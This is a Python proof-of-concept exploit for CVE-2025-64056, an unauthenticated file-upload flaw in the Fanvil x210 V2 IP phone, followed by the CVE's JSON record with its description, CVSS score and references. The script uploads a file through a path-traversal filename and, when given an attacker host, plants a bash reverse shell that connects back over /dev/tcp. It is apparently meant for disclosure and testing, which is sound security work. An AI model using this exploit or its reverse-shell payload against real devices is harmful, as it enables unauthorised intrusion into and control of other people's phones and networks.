CVE-2025-64056

#!/usr/bin/env python3 """ CVE-2025-64056 PoC - Fanvil x210 V2 File Upload Vulnerability Target: Fanvil x210 V2 with firmware <= 2.12.20 Usage: python3 cve-2025-64056.py <target_ip> """ import requests import sys import argparse def exploit_file_upload(target_ip, lhost=None, lport=4444): """ Exploit the unauthenticated file upload vulnerability in Fanvil x210 V2 """ # Target URL - typically the web management interface upload endpoint url = f"http://{target_ip}/cgi-bin/upload.cgi" # Prepare malicious payload - reverse shell script if lhost: payload = f"#!/bin/bash\n/bin/bash -i > /dev/tcp/{lhost}/{lport} 0>&1" else: payload = "#!/bin/bash\necho 'VULNERABLE' > /tmp/pwned.txt" # Construct multipart form data with path traversal files = { 'file': ('../../../../../tmp/shell.sh', payload, 'application/octet-stream'), 'filename': (None, 'test.txt', None) } headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'Accept': '*/*' } print(f"[*] Target: {target_ip}") print(f"[*] Exploiting file upload vulnerability...") try: response = requests.post(url, files=files, headers=headers, timeout=10) print(f"[*] Response Status: {response.status_code}") if response.status_code == 200: print("[+] File upload appears successful!") print("[+] Check if shell.sh exists at /tmp/shell.sh") return True else: print(f"[-] Upload failed with status {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Connection error: {e}") return False def check_vulnerability(target_ip): """ Check if target is vulnerable by probing the upload endpoint """ url = f"http://{target_ip}/cgi-bin/upload.cgi" try: response = requests.get(url, timeout=5) print(f"[*] Target responds to HTTP requests") print(f"[*] Status: {response.status_code}") return True except: print("[-] Target does not respond") return False if __name__ == "__main__": parser = argparse.ArgumentParser(description='CVE-2025-64056 PoC') parser.add_argument('target', help='Target IP address') parser.add_argument('--lhost', help='Local host for reverse shell') parser.add_argument('--lport', default=4444, help='Local port for reverse shell') args = parser.parse_args() print("=" * 60) print("CVE-2025-64056 - Fanvil x210 V2 File Upload") print("=" * 60) if check_vulnerability(args.target): exploit_file_upload(args.target, args.lhost, args.lport)

{"cve": {"id": "CVE-2025-64056", "sourceIdentifier": "[email protected]", "published": "2025-12-05T16:15:50.470", "lastModified": "2026-01-09T02:18:13.197", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "File upload vulnerability in Fanvil x210 V2 2.12.20 allows unauthenticated attackers on the local network to store arbitrary files on the filesystem."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:fanvil:x210_firmware:2.12.20:*:*:*:*:*:*:*", "matchCriteriaId": "B5339CEB-DD13-43D9-9DBB-F58EA2EDC47D"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:fanvil:x210:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "826351F9-626E-4EA9-9634-9E04B462AF4A"}]}]}], "references": [{"url": "http://fanvil.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/SpikeReply/advisories/blob/main/cve/fanvil/cve-2025-64056.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}